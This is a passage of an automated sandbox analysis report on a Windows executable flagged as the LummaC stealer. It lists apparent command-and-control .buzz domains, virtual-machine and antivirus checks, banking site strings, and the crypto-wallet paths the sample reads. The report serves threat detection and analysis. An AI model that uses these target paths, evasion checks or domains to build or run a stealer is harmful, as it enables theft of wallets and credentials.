                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,0_2_004361E0
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3524
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\f70a2ed2-366a-4491-ade6-62f885666fcfJump to behavior
                    Source: 5Z19n7XRT1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2271080139.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003051000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270934619.000000000305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 5Z19n7XRT1.exeReversingLabs: Detection: 55%
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile read: C:\Users\user\Desktop\5Z19n7XRT1.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\5Z19n7XRT1.exe "C:\Users\user\Desktop\5Z19n7XRT1.exe"
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1880
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeUnpacked PE file: 0.2.5Z19n7XRT1.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeUnpacked PE file: 0.2.5Z19n7XRT1.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0043F83E push es; retf 0_2_0043F83F
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0041ACF6 push esp; iretd 0_2_0041ACFF
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00444520 push ebp; ret 0_2_00444522
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0043BF00 push eax; mov dword ptr [esp], 49484716h0_2_0043BF01
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_008BC1CD pushad ; ret 0_2_008BC1D2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_008BC453 push ebp; ret 0_2_008BC458
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024CC167 push eax; mov dword ptr [esp], 49484716h0_2_024CC168
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024CF6A5 push es; retf 0_2_024CF6A6
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024AAF5D push esp; iretd 0_2_024AAF66
                    Source: 5Z19n7XRT1.exeStatic PE information: section name: .text entropy: 7.373879060362512
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exe TID: 6064Thread sleep time: -240000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: Amcache.hve.5.drBinary or memory string: VMware
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                    Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199960919.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000002.2390650962.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199960919.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWb
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                    Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.000000000305E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                    Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270570710.0000000003059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeAPI call chain: ExitProcess graph end nodegraph_0-26318
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0043A9B0 LdrInitializeThunk,0_2_0043A9B0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_008B905B push dword ptr fs:[00000030h]0_2_008B905B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0249092B mov eax, dword ptr fs:[00000030h]0_2_0249092B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_02490D90 mov eax, dword ptr fs:[00000030h]0_2_02490D90

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    LummaC encrypted strings found
                    Source: 5Z19n7XRT1.exeString found in binary or memory: hummskitnj.buzz
                    Source: 5Z19n7XRT1.exeString found in binary or memory: cashfuzysao.buzz
                    Source: 5Z19n7XRT1.exeString found in binary or memory: appliacnesot.buzz
                    Source: 5Z19n7XRT1.exeString found in binary or memory: screwamusresz.buzz
                    Source: 5Z19n7XRT1.exeString found in binary or memory: inherineau.buzz
                    Source: 5Z19n7XRT1.exeString found in binary or memory: scentniej.buzz
                    Source: 5Z19n7XRT1.exeString found in binary or memory: rebuildeso.buzz
                    Source: 5Z19n7XRT1.exeString found in binary or memory: prisonyfork.buzz
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: 0.2.5Z19n7XRT1.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.5Z19n7XRT1.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5Z19n7XRT1.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.5Z19n7XRT1.exe.24e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2160718112.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2391091654.0000000003038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2391091654.0000000003038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390575596.00000000008AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2391091654.0000000003038000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                    Source: 5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000092D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
